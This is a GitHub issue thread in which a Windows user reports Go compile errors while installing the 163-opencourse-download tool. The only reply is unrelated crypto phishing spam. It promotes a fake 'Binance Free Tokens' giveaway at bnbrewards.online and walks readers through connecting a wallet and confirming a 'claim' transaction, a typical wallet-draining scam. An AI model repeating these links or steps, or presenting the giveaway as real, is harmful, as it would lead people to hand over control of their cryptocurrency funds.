### ISSUE TITLE
How to solve the problem when install 163-opencourse-download?

### ISSUE THREAD

**Issue by mikelee4759234** [Chyroc/163-opencourse-download#1]
In order to install 163-opencourse-download,I do the following steps:
1. My os is win7 64bit
2. install go language pass through the file go1.13.8.windows-amd64.msi download from the internet. All settings during installation are default. 
3. Open the Internet
4. Execute command line：
     go get github.com/zieckey/golang.org
5.  Folder "C:\Go\src\golang.org" rename to "C:\Go\src\golang.org-bak"
6.  copy the folder "C:\Users\Administrator\go\src\github.com\zieckey\golang.org" to "C:\Go\src\"
7.  Execute command line：
      C:\Go>go get -u github.com/Chyroc/163-opencourse-download
# github.com/Chyroc/163-opencourse-download
C:\Users\Administrator\go\src\github.com\Chyroc\163-opencourse-download\main.go:
23:9: invalid argument c.Args() (type cli.Args) for len
C:\Users\Administrator\go\src\github.com\Chyroc\163-opencourse-download\main.go:
29:17: cannot use cli.StringFlag literal (type cli.StringFlag) as type cli.Flag
in array or slice literal:
        cli.StringFlag does not implement cli.Flag (Apply method has pointer rec
eiver)

How to solve the above errors？

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
